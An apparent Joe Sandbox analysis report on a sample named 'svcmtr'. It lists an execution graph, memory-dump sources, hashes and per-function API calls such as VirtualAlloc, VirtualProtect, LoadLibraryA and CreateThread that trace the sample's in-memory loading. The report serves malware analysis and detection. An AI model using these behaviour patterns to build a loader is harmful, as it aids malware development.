                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: d31bdf12b9d91aac1500cf151175c217257593f83f05e0711e82fec2d2b4caae
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: B501F4B5D3012A9AEF294E30CC49FBD7635FB90704F1482A9D94AE2041EB310E729E80

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:307
                                                                                                                            Total number of Limit Nodes:5
                                                                                                                            execution_graph 5578 2b082b 5579 2b0846 5578->5579 5582 2b08bd 5579->5582 5581 2b089c 5587 2b08ce 5582->5587 5584 2b08c2 EnumWindows 5586 2b0946 5584->5586 5586->5581 5588 2b08eb 5587->5588 5589 2b093a EnumWindows 5588->5589 5590 2b0946 5589->5590 5590->5584 5776 2b21ab 5777 2b21c6 5776->5777 5778 2b21d8 RtlExitUserThread 5777->5778 5779 2b21e4 5778->5779 5784 2b1fa9 5785 2b1fb3 5784->5785 5786 2b20b8 3 API calls 5785->5786 5788 2b20ab 5786->5788 5787 2b2124 CreateThread 5789 2b2130 5787->5789 5788->5787 5790 2b216c RtlExitUserThread 5789->5790 5791 2b215a 5790->5791 5792 2b21d8 RtlExitUserThread 5791->5792 5793 2b21e4 5792->5793 5605 2b2122 5606 2b2124 CreateThread 5605->5606 5607 2b2130 5606->5607 5608 2b216c RtlExitUserThread 5607->5608 5609 2b215a 5608->5609 5610 2b21d8 RtlExitUserThread 5609->5610 5611 2b21e4 5610->5611 5798 2b07a2 5799 2b07b4 5798->5799 5800 2b07d9 2 API calls 5799->5800 5803 2b07ce 5799->5803 5800->5803 5801 2b08bd 2 API calls 5802 2b089c 5801->5802 5803->5801 5456 2b13bb 5457 2b13d6 5456->5457 5458 2b13e8 VirtualProtect 5457->5458 5459 2b13f4 5458->5459 5460 2b1e3a 5461 2b1e3c VirtualAlloc 5460->5461 5462 2b1e48 5461->5462 5478 2b1ebb 5462->5478 5464 2b1eb4 5466 2b1f4f 5504 2b1f6a 5466->5504 5468 2b1f5e 5469 2b1fe3 5468->5469 5492 2b20b8 5469->5492 5471 2b2124 CreateThread 5473 2b2130 5471->5473 5472 2b20ab 5472->5471 5500 2b216c 5473->5500 5475 2b215a 5476 2b21d8 RtlExitUserThread 5475->5476 5477 2b21e4 5476->5477 5480 2b1ed8 5478->5480 5479 2b1fe3 5484 2b20b8 3 API calls 5479->5484 5480->5479 5481 2b1f4f 5480->5481 5482 2b1f6a 5 API calls 5481->5482 5483 2b1f5e 5482->5483 5483->5479 5486 2b20ab 5484->5486 5485 2b2124 CreateThread 5487 2b2130 5485->5487 5486->5485 5488 2b216c RtlExitUserThread 5487->5488 5489 2b215a 5488->5489 5490 2b21d8 RtlExitUserThread 5489->5490 5491 2b1ea7 5490->5491 5491->5464 5491->5466 5491->5469 5493 2b20d5 5492->5493 5494 2b2124 CreateThread 5493->5494 5495 2b2130 5494->5495 5496 2b216c RtlExitUserThread 5495->5496 5497 2b215a 5496->5497 5498 2b21d8 RtlExitUserThread 5497->5498 5499 2b21e4 5498->5499 5499->5472 5501 2b2189 5500->5501 5502 2b21d8 RtlExitUserThread 5501->5502 5503 2b21e4 5502->5503 5503->5475 5505 2b1f87 5504->5505 5506 2b20b8 3 API calls 5505->5506 5508 2b20ab 5506->5508 5507 2b2124 CreateThread 5509 2b2130 5507->5509 5508->5507 5510 2b216c RtlExitUserThread 5509->5510 5511 2b215a 5510->5511 5512 2b21d8 RtlExitUserThread 5511->5512 5513 2b21e4 5512->5513 5513->5468 5514 2b1639 5515 2b1654 5514->5515 5516 2b1666 VirtualProtect 5515->5516 5517 2b1672 5516->5517 5518 2b1797 VirtualProtect 5517->5518 5519 2b17d6 5517->5519 5518->5517 5520 2b0938 5521 2b093a EnumWindows 5520->5521 5522 2b0946 5521->5522 5624 2b1f30 5625 2b1f41 5624->5625 5627 2b1f5e 5624->5627 5626 2b1f6a 5 API calls 5625->5626 5625->5627 5626->5627 5628 2b20b8 3 API calls 5627->5628 5630 2b20ab 5628->5630 5629 2b2124 CreateThread 5631 2b2130 5629->5631 5630->5629 5632 2b216c RtlExitUserThread 5631->5632 5633 2b215a 5632->5633 5634 2b21d8 RtlExitUserThread 5633->5634 5635 2b21e4 5634->5635 5549 2b1b34 5550 2b1b4f 5549->5550 5551 2b1b61 VirtualProtect 5550->5551 5552 2b1b6d 5551->5552 5553 2b2148 5552->5553 5555 2b1c6c 5552->5555 5554 2b216c RtlExitUserThread 5553->5554 5557 2b215a 5554->5557 5561 2b1dd0 5555->5561 5559 2b21d8 RtlExitUserThread 5557->5559 5560 2b21e4 5559->5560 5562 2b1ded 5561->5562 5563 2b1e3c VirtualAlloc 5562->5563 5564 2b1e48 5563->5564 5565 2b1ebb 7 API calls 5564->5565 5566 2b1ea7 5565->5566 5567 2b1eb4 5566->5567 5568 2b1f6a 5 API calls 5566->5568 5569 2b1f5e 5566->5569 5568->5569 5570 2b20b8 3 API calls 5569->5570 5572 2b20ab 5570->5572 5571 2b2124 CreateThread 5573 2b2130 5571->5573 5572->5571 5574 2b216c RtlExitUserThread 5573->5574 5575 2b215a 5574->5575 5576 2b21d8 RtlExitUserThread 5575->5576 5577 2b1dc3 5576->5577 5816 2b068b 5817 2b06a8 5816->5817 5825 2b0716 5817->5825 5819 2b0a2b 5820 2b0709 5820->5819 5821 2b07d9 2 API calls 5820->5821 5824 2b07ce 5820->5824 5821->5824 5822 2b08bd 2 API calls 5823 2b089c 5822->5823 5824->5822 5826 2b0733 5825->5826 5827 2b07d9 2 API calls 5826->5827 5829 2b0a2b 5826->5829 5831 2b07ce 5826->5831 5827->5831 5828 2b08bd 2 API calls 5830 2b089c 5828->5830 5829->5820 5830->5820 5831->5828 5832 2b078b 5833 2b079c 5832->5833 5836 2b0a2b 5832->5836 5834 2b07d9 2 API calls 5833->5834 5838 2b07ce 5833->5838 5834->5838 5835 2b08bd 2 API calls 5837 2b089c 5835->5837 5838->5835 5636 2b1e0f 5637 2b1e2a 5636->5637 5638 2b1e3c VirtualAlloc 5637->5638 5639 2b1e48 5638->5639 5640 2b1ebb 7 API calls 5639->5640 5642 2b1ea7 5640->5642 5641 2b1eb4 5642->5641 5643 2b1f6a 5 API calls 5642->5643 5644 2b1f5e 5642->5644 5643->5644 5645 2b20b8 3 API calls 5644->5645 5647 2b20ab 5645->5647 5646 2b2124 CreateThread 5648 2b2130 5646->5648 5647->5646 5649 2b216c RtlExitUserThread 5648->5649 5650 2b215a 5649->5650 5651 2b21d8 RtlExitUserThread 5650->5651 5652 2b21e4 5651->5652 5653 2b090d 5654 2b0928 5653->5654 5655 2b093a EnumWindows 5654->5655 5656 2b0946 5655->5656 5657 2b0700 5658 2b070d 5657->5658 5662 2b0a2b 5658->5662 5663 2b07ce 5658->5663 5664 2b07d9 5658->5664 5660 2b08bd 2 API calls 5661 2b089c 5660->5661 5663->5660 5669 2b07ec 5664->5669 5666 2b07df 5667 2b08bd 2 API calls 5666->5667 5668 2b089c 5667->5668 5668->5663 5670 2b0809 5669->5670 5671 2b08bd 2 API calls 5670->5671 5672 2b089c 5671->5672 5672->5666 5673 2b1013 5674 2b1030 5673->5674 5675 2b107f LoadLibraryA 5674->5675 5676 2b108b 5675->5676 5677 2b176a 5680 2b16ad 5677->5680 5678 2b1797 VirtualProtect 5678->5680 5679 2b17d6 5680->5678 5680->5679 5681 2b1b6a 5682 2b1b79 5681->5682 5683 2b2148 5682->5683 5685 2b1c6c 5682->5685 5684 2b216c RtlExitUserThread 5683->5684 5687 2b215a 5684->5687 5686 2b1dd0 10 API calls 5685->5686 5688 2b1dc3 5686->5688 5689 2b21d8 RtlExitUserThread 5687->5689 5690 2b21e4 5689->5690 5709 2b1c65 5710 2b1c77 5709->5710 5711 2b1dd0 10 API calls 5710->5711 5712 2b1dc3 5711->5712 5874 2b1efa 5875 2b1f15 5874->5875 5876 2b1f6a 5 API calls 5875->5876 5877 2b1f5e 5875->5877 5876->5877 5878 2b20b8 3 API calls 5877->5878 5880 2b20ab 5878->5880 5879 2b2124 CreateThread 5881 2b2130 5879->5881 5880->5879 5882 2b216c RtlExitUserThread 5881->5882 5883 2b215a 5882->5883 5884 2b21d8 RtlExitUserThread 5883->5884 5885 2b21e4 5884->5885 5886 2b15fa 5887 2b1617 5886->5887 5888 2b1666 VirtualProtect 5887->5888 5890 2b1672 5888->5890 5889 2b1797 VirtualProtect 5889->5890 5890->5889 5891 2b17d6 5890->5891 5533 2b107d 5534 2b107f LoadLibraryA 5533->5534 5535 2b108b 5534->5535 5713 2b137c 5714 2b1399 5713->5714 5715 2b13e8 VirtualProtect 5714->5715 5716 2b13f4 5715->5716 5536 2b1ff0 5537 2b1ff2 5536->5537 5538 2b20b8 3 API calls 5537->5538 5540 2b20ab 5538->5540 5539 2b2124 CreateThread 5541 2b2130 5539->5541 5540->5539 5542 2b216c RtlExitUserThread 5541->5542 5543 2b215a 5542->5543 5544 2b21d8 RtlExitUserThread 5543->5544 5545 2b21e4 5544->5545 5892 2b20f7 5893 2b2112 5892->5893 5894 2b2124 CreateThread 5893->5894 5895 2b2130 5894->5895 5896 2b216c RtlExitUserThread 5895->5896 5897 2b215a 5896->5897 5898 2b21d8 RtlExitUserThread 5897->5898 5899 2b21e4 5898->5899 5900 2b1af5 5901 2b1b12 5900->5901 5902 2b1b61 VirtualProtect 5901->5902 5903 2b1b6d 5902->5903 5904 2b2148 5903->5904 5906 2b1c6c 5903->5906 5905 2b216c RtlExitUserThread 5904->5905 5908 2b215a 5905->5908 5907 2b1dd0 10 API calls 5906->5907 5909 2b1dc3 5907->5909 5910 2b21d8 RtlExitUserThread 5908->5910 5911 2b21e4 5910->5911 5921 2b06ca 5922 2b06e5 5921->5922 5923 2b0716 2 API calls 5922->5923 5924 2b0709 5923->5924 5925 2b07d9 2 API calls 5924->5925 5927 2b0a2b 5924->5927 5929 2b07ce 5924->5929 5925->5929 5926 2b08bd 2 API calls 5928 2b089c 5926->5928 5929->5926 5731 2b1f58 5732 2b1f59 5731->5732 5733 2b1f6a 5 API calls 5732->5733 5734 2b1f5e 5733->5734 5735 2b20b8 3 API calls 5734->5735 5737 2b20ab 5735->5737 5736 2b2124 CreateThread 5738 2b2130 5736->5738 5737->5736 5739 2b216c RtlExitUserThread 5738->5739 5740 2b215a 5739->5740 5741 2b21d8 RtlExitUserThread 5740->5741 5742 2b21e4 5741->5742 5546 2b21d6 5547 2b21d8 RtlExitUserThread 5546->5547 5548 2b21e4 5547->5548 5765 2b0856 5766 2b0858 5765->5766 5767 2b08bd 2 API calls 5766->5767 5768 2b089c 5767->5768 5769 2b0755 5770 2b0770 5769->5770 5771 2b07d9 2 API calls 5770->5771 5773 2b0a2b 5770->5773 5775 2b07ce 5770->5775 5771->5775 5772 2b08bd 2 API calls 5774 2b089c 5772->5774 5775->5772

                                                                                                                            Executed Functions

                                                                                                                            Function 002B1AF5 Relevance: 3.3, APIs: 2, Instructions: 283memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 002B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                              • Part of subcall function 002B1DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 0c15396a1fd1c5a67efc47271c8e6daa0213b4916830b4af3b4b0b8853b47323
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: EE916C72E34725CBEB19CA68CCA1BFDB672FBC0340F59866AC107EB145DAB459648E40
                                                                                                                            Function 002B1B34 Relevance: 1.7, APIs: 1, Instructions: 192memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 002B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002B21D8
                                                                                                                              • Part of subcall function 002B1DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: 42bbf0a5ccf9b8719348ae749bb8d868705d99ab08546b6f3cea20931819eb6e
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 2E612A72E34329CFDB19CE64CC917EDB772FB84344F6586AAC006AB244DBB059658F81
                                                                                                                            Function 002B1DD0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: 9cc8bdb2c234d1a4116eea10b9e0f19c2f419205d39da107d141c6369f01fff2
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: 72919A76A30726DAFF1D5674CC66BFD6416E7E0780F68E52CA203D9583DEFC48649A00
                                                                                                                            Function 002B137C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 103 2b137c-2b148f call 2b0af8 * 2 call 2b0c47 VirtualProtect 116 2b14a9-2b14f1 103->116 117 2b1491-2b14a4 103->117 120 2b14f7-2b1559 116->120 117->116 124 2b155b-2b1561 120->124
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: 57047f3ebd9402dd144356ef86d737a4be7a2c3d167fe2e792e7eedc96d29eec
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: BE51D637E201249FEB0CCF69CC91AADB7B2FBD4310F5A9139D406EF691DA7899108640
                                                                                                                            Function 002B15FA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B1666
                                                                                                                              • Part of subcall function 002B172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction ID: 81e99b242fd930047296dd04786440dda9be65bea87cb8d61408d0763955a224
                                                                                                                            • Opcode Fuzzy Hash: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction Fuzzy Hash: 59416E33A304129AEB0C5B68CDB5BFDA699E7D4380FADD53DA103DA1C6DEBC48709550
                                                                                                                            Function 002B13BB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 169 2b13bb-2b13ef call 2b0c47 VirtualProtect 175 2b13f4-2b148f 169->175 177 2b14a9-2b14f1 175->177 178 2b1491-2b14a4 175->178 181 2b14f7-2b1559 177->181 178->177 185 2b155b-2b1561 181->185
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction ID: 5c0b47c4cc10713c3feb84e6d6fdfc648a815ab905aeea267f5b3ae886a2a865
                                                                                                                            • Opcode Fuzzy Hash: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction Fuzzy Hash: 8C41A537E20124DFDF0CCF99D891AACB7B2FBD4310F5A9169D816AF691DB7499108A80
                                                                                                                            Function 002B1639 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 186 2b1639-2b16aa call 2b0c47 VirtualProtect 196 2b16ad-2b1724 call 2b0eb7 call 2b172b 186->196 205 2b1726-2b1792 call 2b0af8 * 2 call 2b0c47 196->205 206 2b1795-2b1796 196->206 208 2b1797-2b179e VirtualProtect 205->208 206->208 209 2b17a3-2b17d0 208->209 209->196 220 2b17d6-2b17e4 209->220
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002B1666
                                                                                                                              • Part of subcall function 002B172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 002B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: 7c59d33eb90027e264d6881b8cea546adcaa6af0e902a015457d335e3254ba20
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: 66414D33A301129BDB0C5BA8CDB56FDB799EBD4381FADD62D9003DA186DFB84470A650
                                                                                                                            Function 002B1EBB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 278COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 57b8d43680b2ca870daad4f13bdbd6d078abb00736426198be742142b6c840f3
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: 0671697AA34712DAFB1C22B8CC66BFD6406E7E0781F6CE93DA203D9583CEEC44649500
                                                                                                                            Function 002B1EFA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 314 2b1efa-2b1f3b call 2b0c47 322 2b1fe3-2b20ac call 2b12ba call 2b0f8f call 2b1564 call 2b20b8 314->322 323 2b1f41-2b1f49 314->323 361 2b20ae-2b20af 322->361 362 2b2113 322->362 323->322 324 2b1f4f-2b1f5f call 2b1f6a 323->324 333 2b1fca-2b1fd1 324->333 334 2b1f61 324->334 344 2b1fd6-2b1fe2 333->344 336 2b1fb3-2b1fc9 call 2b0c47 334->336 337 2b1f63 334->337 336->333 341 2b1f65-2b1fb2 call 2b0af8 * 2 337->341 342 2b1fd4-2b1fd5 337->342 341->336 342->344 344->322 363 2b2116-2b2119 361->363 364 2b20b1-2b2119 call 2b0af8 * 2 call 2b0c47 361->364 362->363 365 2b211d-2b21f1 CreateThread call 2b216c call 2b0af8 * 2 call 2b0c47 RtlExitUserThread 363->365 364->365
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: b92905a5f196504d8c75a37fb08495eaa99059afcd1cfad10a50aac7ead7d960
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: 04619B36A30712DAFB1C62B8CC66BFD6456EBE0390F6CE53DA203D8593CEEC04649900
                                                                                                                            Function 002B1F25 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 398 2b1f25-2b1f3b 402 2b1fe3-2b20ac call 2b12ba call 2b0f8f call 2b1564 call 2b20b8 398->402 403 2b1f41-2b1f49 398->403 441 2b20ae-2b20af 402->441 442 2b2113 402->442 403->402 404 2b1f4f-2b1f5f call 2b1f6a 403->404 413 2b1fca-2b1fd1 404->413 414 2b1f61 404->414 424 2b1fd6-2b1fe2 413->424 416 2b1fb3-2b1fc9 call 2b0c47 414->416 417 2b1f63 414->417 416->413 421 2b1f65-2b1fb2 call 2b0af8 * 2 417->421 422 2b1fd4-2b1fd5 417->422 421->416 422->424 424->402 443 2b2116-2b2119 441->443 444 2b20b1-2b2119 call 2b0af8 * 2 call 2b0c47 441->444 442->443 445 2b211d-2b21f1 CreateThread call 2b216c call 2b0af8 * 2 call 2b0c47 RtlExitUserThread 443->445 444->445
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction ID: 6e753333fdd9dc44cb205c5011c26cb557f4026fe38307adb3756b2bd5240058
                                                                                                                            • Opcode Fuzzy Hash: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction Fuzzy Hash: 92518B76A34712DAFB1C62B8CC66BFD6416E7E0790F6CE52DA203D9593CEEC04649500
                                                                                                                            Function 002B1013 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 478 2b1013-2b109c call 2b0af8 * 2 call 2b0c47 LoadLibraryA 491 2b109e-2b10ab 478->491 492 2b10ad-2b10b8 478->492 494 2b10ba-2b10f7 491->494 492->494 499 2b124e-2b1264 494->499 500 2b10fd-2b1107 494->500 508 2b1299-2b12a8 499->508 509 2b1266-2b1279 499->509 501 2b1109-2b1125 500->501 502 2b1127-2b1142 500->502 511 2b1147-2b1163 call 2b116e 501->511 502->511 512 2b127b-2b127e 509->512 519 2b1165-2b11d3 call 2b0af8 * 2 call 2b0c47 511->519 520 2b11d4-2b11f8 511->520 513 2b1280-2b1293 512->513 514 2b1295-2b1297 512->514 513->512 514->508 519->520 528 2b11fa-2b1206 520->528 529 2b123e-2b1249 520->529 531 2b1208-2b1216 528->531 532 2b1236-2b123b 528->532 534 2b1218-2b121b 531->534 532->529 536 2b122d-2b1231 534->536 537 2b121d-2b122b 534->537 536->532 537->534
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction ID: b488df895b09068d4158488ecc79b1d106c9c2abf01af0c1b0f5b3dd3ec94d10
                                                                                                                            • Opcode Fuzzy Hash: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction Fuzzy Hash: 34616772E741528EEB0D9A68CCB17FD6696EBC0381FACD53DCA03DA1C1CEB844708A50
